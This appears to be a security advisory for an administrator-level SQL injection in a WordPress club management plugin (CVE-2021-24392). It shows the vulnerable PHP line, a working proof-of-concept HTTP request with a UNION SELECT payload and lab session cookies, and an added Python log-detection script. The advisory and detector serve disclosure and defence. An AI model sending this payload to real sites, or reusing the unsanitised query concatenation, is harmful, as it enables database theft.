Wp Plugin Club Management Software

Plugin Details

Plugin Name: wp-plugin : club-management-software
Affected Version : 1 (and most probably lower versions, if any)
Vulnerability : Injection
Minimum Level of Access Required : Administrator
CVE Number : CVE-2021-24392
Identified by : Syed Sheeraz Ali
WPScan Reference URL

Disclosure Timeline

Technical Details

Vulnerable File: admin/section/swiftbook-add-email-templates.php#30

Vulnerable Code block and parameter:

Administrator-level SQLi via the id parameter in admin/section/swiftbook-add-email-templates.php#30, where $_GET['id'] is concatenated directly into the query:

30:        $template = $wpdb->get_row("SELECT * FROM `$table_emailtemplate` WHERE `et_id`=" . $_GET['id']);

Exploit

GET /wp-admin/admin.php?page=swiftbook_add_email_template&id=0 UNION ALL SELECT NULL,NULL,user(),NULL,NULL-- - HTTP/1.1
Host: 172.28.128.50
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-GPC: 1
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: wordpress_232395f24f6cff47569f2739c21385d6=admin%7C1620726112%7CswM2ule4AKH1D9P6ARH66iCAXAsLU4qMaspNCuUmiPI%7Ccbac3b5e282c4133c3b8ed967d2f86e39589bda3013bb0bbd80dce02def1caf8; wordpress_test_cookie=WP%20Cookie%20check; tk_ai=woo%3AKa6IHGxtReqSiNAwAVhqbvCQ; wordpress_logged_in_232395f24f6cff47569f2739c21385d6=admin%7C1620726112%7CswM2ule4AKH1D9P6ARH66iCAXAsLU4qMaspNCuUmiPI%7C78dbf8517e6d99fee9828d0fc243b12a05b043d183208e3b967d0becd946f23d; wp-settings-1=mfold%3Do%26editor%3Dtinymce; wp-settings-time-1=1620553312
Connection: close

<div class="variable-list">
<h4>Replace following</h4>
<ul>
<li>Bob@localhost = {bob@localhost}</li>
</ul>
</div>
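
A detection check for the request shown above, as an added example that is not part of the original advisory: it flags any request to this admin page whose id is not a bare integer. The log format, client addresses and the function name suspicious_requests are assumptions, the log lines are constructed, and et_id is assumed to be an integer key.

```python
import re
from urllib.parse import urlsplit, parse_qs

TARGET_PAGE = "swiftbook_add_email_template"   # page value from the advisory's request
# Greedy target capture: raw spaces in the request line (as in the PoC) are kept.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>.*) HTTP/\d(?:\.\d)?"')
INTEGER_RE = re.compile(r"[0-9]+")             # assumption: et_id is an integer key

# Constructed access-log lines (common log format); not taken from the advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [11/May/2021:09:40:01 +0000] "GET /wp-admin/admin.php?page=swiftbook_add_email_template&id=3 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [11/May/2021:09:41:52 +0000] "GET /wp-admin/admin.php?page=swiftbook_add_email_template&id=0 UNION ALL SELECT NULL,NULL,user(),NULL,NULL-- - HTTP/1.1" 200 5188',
    '198.51.100.4 - - [11/May/2021:09:42:10 +0000] "GET /wp-admin/admin.php?page=swiftbook_add_email_template&id=0%20UNION%20ALL%20SELECT%20NULL,NULL,user(),NULL,NULL--%20- HTTP/1.1" 200 5188',
    '192.0.2.10 - - [11/May/2021:09:43:00 +0000] "GET /wp-admin/admin.php?page=another_plugin&id=abc HTTP/1.1" 200 900',
    '192.0.2.10 - - [11/May/2021:09:44:00 +0000] "GET /wp-admin/admin.php?page=swiftbook_add_email_template HTTP/1.1" 200 4800',
]

def suspicious_requests(lines):
    """Return (client, bad_id_values) for requests to the page with a non-integer id."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group("target"))
        params = parse_qs(url.query)           # percent-decodes and maps '+' to space
        if not url.path.endswith("/wp-admin/admin.php"):
            continue
        if TARGET_PAGE not in params.get("page", []):
            continue
        # PHP keeps the last duplicate, but any non-integer id is worth flagging.
        bad = [v for v in params.get("id", []) if not INTEGER_RE.fullmatch(v)]
        if bad:
            hits.append((line.split()[0], bad))
    return hits

if __name__ == "__main__":
    for client, values in suspicious_requests(SAMPLE_LOG):
        print(client, values)
```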